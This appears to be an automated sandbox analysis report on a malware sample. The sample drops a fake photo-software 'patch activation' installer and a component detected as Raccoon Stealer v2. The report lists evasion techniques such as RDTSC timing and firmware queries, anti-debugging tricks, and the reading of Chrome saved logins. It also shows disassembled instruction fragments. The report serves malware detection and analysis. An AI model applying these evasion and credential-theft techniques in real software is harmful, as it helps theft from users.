                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSystem information queried: FirmwareTableInformation
                      Tries to evade analysis by execution special instruction (VM detection)
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSpecial instruction interceptor: First address: 0000000000F3F96C instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSpecial instruction interceptor: First address: 0000000000E151C1 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000F057DF second address: 0000000000F057EA instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000F0772D second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 test sp, 69E2h 0x00000007 cmp ebp, 35ED30BCh 0x0000000d cmc 0x0000000e sub esi, 00000008h 0x00000014 test si, bp 0x00000017 cmc 0x00000018 mov dword ptr [esi], edx 0x0000001a cmp edx, eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f xor al, 65h 0x00000021 ror al, 00000008h 0x00000024 lea edi, dword ptr [edi-00000004h] 0x0000002a add ah, FFFFFFEFh 0x0000002d shld ax, dx, 000000ADh 0x00000032 movsx eax, sp 0x00000035 mov eax, dword ptr [edi] 0x00000037 cmc 0x00000038 test dx, si 0x0000003b xor eax, ebx 0x0000003d jmp 00007F3880CC7661h 0x00000042 not eax 0x00000044 jmp 00007F3880A70423h 0x00000049 inc eax 0x0000004a jmp 00007F3880BC463Ch 0x0000004f bswap eax 0x00000051 inc eax 0x00000052 stc 0x00000053 jmp 00007F3880E3AE9Bh 0x00000058 xor ebx, eax 0x0000005a cmc 0x0000005b add ebp, eax 0x0000005d jmp 00007F3880B9D1CAh 0x00000062 jmp 00007F3880C31C8Eh 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmp esi, ecx 0x0000006d jmp 00007F3880B95358h 0x00000072 ja 00007F3880C6EB57h 0x00000078 jmp ebp 0x0000007a mov ecx, dword ptr [esi] 0x0000007c cmovnb edx, ebx 0x0000007f mov dh, 00000054h 0x00000082 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000E13F38 second address: 0000000000E13F4C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000E5AB1B second address: 0000000000E5AB29 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000E096EF second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C2CC7Ah 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880E883C8h 0x00000036 bswap eax 0x00000038 jmp 00007F3880A38857h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C1770Ch 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C7E24Eh 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880B46358h 0x0000005a jmp 00007F3880D471C3h 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880B951F8h 0x0000006a ja 00007F3880C6E9F7h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000A9EC46 second address: 0000000000A9EC5A instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000B4EE51 second address: 0000000000B4EE5F instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000BA7F6C second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C65F7Bh 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880A032B5h 0x00000036 bswap eax 0x00000038 jmp 00007F3880C9CF65h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C8C1F9h 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C32E1Ah 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880E20AC4h 0x0000005a jmp 00007F3880A1952Eh 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880CA8223h 0x0000006a ja 00007F3880D08B20h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000BEF6D9 second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 test esp, edi 0x00000004 cmp ecx, 48F76367h 0x0000000a sub esi, 00000008h 0x00000010 mov dword ptr [esi], edx 0x00000012 cmc 0x00000013 test esp, 07E44ACCh 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c bt ax, 004Bh 0x00000021 rcl al, cl 0x00000023 xchg ah, al 0x00000025 lea edi, dword ptr [edi-00000004h] 0x0000002b lahf 0x0000002c mov ax, 74F3h 0x00000030 mov eax, dword ptr [edi] 0x00000032 clc 0x00000033 xor eax, ebx 0x00000035 jmp 00007F3880AC1624h 0x0000003a not eax 0x0000003c jmp 00007F3880B1F93Ah 0x00000041 inc eax 0x00000042 bswap eax 0x00000044 jmp 00007F3880DE2414h 0x00000049 inc eax 0x0000004a cmc 0x0000004b test eax, edi 0x0000004d xor ebx, eax 0x0000004f cmc 0x00000050 cmp sp, 1B06h 0x00000055 add ebp, eax 0x00000057 jmp 00007F3880A32C34h 0x0000005c jmp 00007F3880DA6E3Bh 0x00000061 lea ecx, dword ptr [esp+60h] 0x00000065 cmp esi, ecx 0x00000067 jmp 00007F3880CA80C3h 0x0000006c ja 00007F3880D089C0h 0x00000072 jmp ebp 0x00000074 mov ecx, dword ptr [esi] 0x00000076 cmovnb edx, ebx 0x00000079 mov dh, 00000054h 0x0000007c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRDTSC instruction interceptor: First address: 0000000000B67EE1 second address: 0000000000B67EEC instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\KbqArOlW06.exe TID: 2236Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeEvasive API call chain: GetSystemTime,DecisionNodes
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeRegistry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeAPI call chain: ExitProcess graph end node
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.507528842.00000000012B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MWar&Prod_VMware_SATA_CD00#5&280b647)
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_0040A050 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00453238 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSystem information queried: ModuleInformation

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeSystem information queried: KernelDebuggerInformation
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0047A678 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042E52C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042F294 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeQueries volume information: C:\Users\user\Desktop\KbqArOlW06.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_004026C4 GetSystemTime,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00455DCC GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00458E58 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00404654 GetModuleHandleA,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Raccoon Stealer v2
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: Process Memory Space: 2.0.0-beta2.cps.exe PID: 2332, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Raccoon Stealer v2
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16636690.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16726700.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.18de6818.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.179e67e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.166866c8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16866738.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16ae6770.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16fe67a8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.18de6818.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16636690.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16726700.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16866738.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.166866c8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.2.0.0-beta2.cps.exe.9a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
